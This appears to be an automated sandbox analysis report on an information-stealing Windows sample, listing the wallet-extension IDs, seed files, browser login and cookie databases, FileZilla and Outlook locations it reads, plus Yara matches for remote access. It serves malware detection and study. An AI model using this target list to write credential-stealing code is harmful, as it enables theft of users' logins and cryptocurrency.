Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MetaMask|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|Binance Wallet|fhbohimaelbohpjbbldcngcnapndodjp|1|0|0|Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase Wallet extension|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|0|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|1|0|0|iWallet|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|1|0|0|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|1|0|0|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra Station Wallet|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|1|0|0|Auro Wallet(Mina Protocol)|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98 Wallet|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain Wallet|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Brave Wallet|odbfpeeihdkbihmopkbjmoonfanlbfcl|1|0|0|Oxygen|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|Pali Wallet|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|BOLT X|aodkkagnadcbobfpggfnjeongemjbjca|1|0|0|XDEFI Wallet|hmeobnfnfcmdkdcmlblgagmfpfboieaf|1|0|0|Nami|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Maiar DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Keeper Wallet|lpilbniiabackdjcionkobglmddfbcjo|1|0|0|Solflare Wallet|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc|1|0|0|Goby|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|Ronin Wallet|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd|1|0|0|OneKey|jnmbobjmhlngoefaiojfljckilhhlhcj|1|0|0|DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik|1|0|0|SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid|1|0|0|Braavos Wallet|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|kkpllkodjeloidieedojogacfhpaihoh|1|1|1|OKX Wallet|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender Wallet|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|Eternl|kmhcihpebfmpgmihbkipmjlmmioameka|1|0|0|Pontem Aptos Wallet|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Petra Aptos Wallet|ejjladinnckdgjemekebdpeokbikhfci|1|0|0|Martian Aptos Wallet|efbglgofoippbgcjepnhiblaibcnclgk|1|0|0|Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra Wallet|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk|1|0|0|Authenticator|bhghoamapcdpbohphigoooaddinpkbai|1|0|0|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\seed.seco*
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.secon
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\*.*z
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\seed.seco*
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: Yara match File source: 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: i3NmF0obCm.exe PID: 6304, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: i3NmF0obCm.exe, type: SAMPLE
Source: Yara match File source: 0.2.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1660747391.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: i3NmF0obCm.exe PID: 6304, type: MEMORYSTR
Source: Yara match File source: decrypted.binstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: i3NmF0obCm.exe, type: SAMPLE
Source: Yara match File source: 0.2.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1660747391.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: i3NmF0obCm.exe PID: 6304, type: MEMORYSTR
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C6C0C40 sqlite3_bind_zeroblob, 0_2_6C6C0C40
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C6C0D60 sqlite3_bind_parameter_name, 0_2_6C6C0D60
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C5E8EA0 sqlite3_clear_bindings, 0_2_6C5E8EA0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C6C0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 0_2_6C6C0B40
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C5E6410 bind,WSAGetLastError, 0_2_6C5E6410